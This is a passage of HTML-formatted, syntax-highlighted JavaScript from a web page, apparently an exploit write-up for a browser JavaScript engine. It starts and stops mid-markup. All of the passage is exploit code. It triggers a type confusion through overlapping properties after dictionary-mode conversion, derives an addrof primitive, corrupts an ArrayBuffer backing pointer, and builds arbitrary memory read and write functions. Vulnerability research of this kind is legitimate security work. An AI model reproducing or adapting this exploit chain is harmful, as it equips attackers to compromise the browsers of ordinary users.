class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">orig<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span 
class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">newValue<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toNumber<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">orig<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-126\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-128\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">x1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.37<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.38<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">victim<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-133\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MAX_ITERATIONS<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.38<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-136\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">make<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.38<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toBigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-140\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">fail<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Corrupt ArrayBuffer failed&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-143\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">find_overlapping_properties<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Properties<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">overlap <\/span><span class=\"crayon-e\">after <\/span><span class=\"crayon-e\">conversion <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dictionary <\/span><span class=\"crayon-v\">mode<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-146\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span 
class=\"crayon-v\">driver_buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-149\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">gc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-151\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-152\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-153\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-154\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-155\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-156\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-157\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">original_driver_buf_ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">corrupt_arraybuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver_buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-158\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-159\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span 
class=\"crayon-v\">driver<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-160\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">original_memview_buf_ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-161\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-162\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-163\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-164\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-168\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-170\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-171\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">subarray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-172\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-173\"><span 